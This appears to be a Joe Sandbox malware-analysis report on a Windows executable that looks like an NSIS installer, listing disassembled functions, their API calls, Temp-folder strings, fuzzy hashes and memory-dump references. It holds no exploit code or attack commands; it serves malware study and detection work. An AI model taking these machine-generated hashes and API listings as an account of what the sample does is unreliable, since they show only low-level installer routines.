Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll, xrefs: 00402552, 00402575, 00402589, 004025D5
C:\Users\user\AppData\Local\Temp\nse2681.tmp, xrefs: 0040257C

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nse2681.tmp$C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll
API String ID: 3109718747-871299093
Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D

Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 10001908
GlobalFree.KERNEL32(?), ref: 10001A93
GlobalFree.KERNEL32(?), ref: 10001A98

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE

Function 00404970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
wsprintfW.USER32 ref: 00404A1A
SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

%u.%u%s%s, xrefs: 004049FB

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68

Function 00405A09 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4083868402
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C

Function 00405128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405157
CallWindowProcW.USER32(?,?,?,?), ref: 004051A8

Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177

Strings

, xrefs: 00405138

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69

Function 00403809 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
GlobalFree.KERNEL32(?), ref: 0040382A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403809

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4083868402
Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8

Function 00405A55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5WP9WCM8qV.exe,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
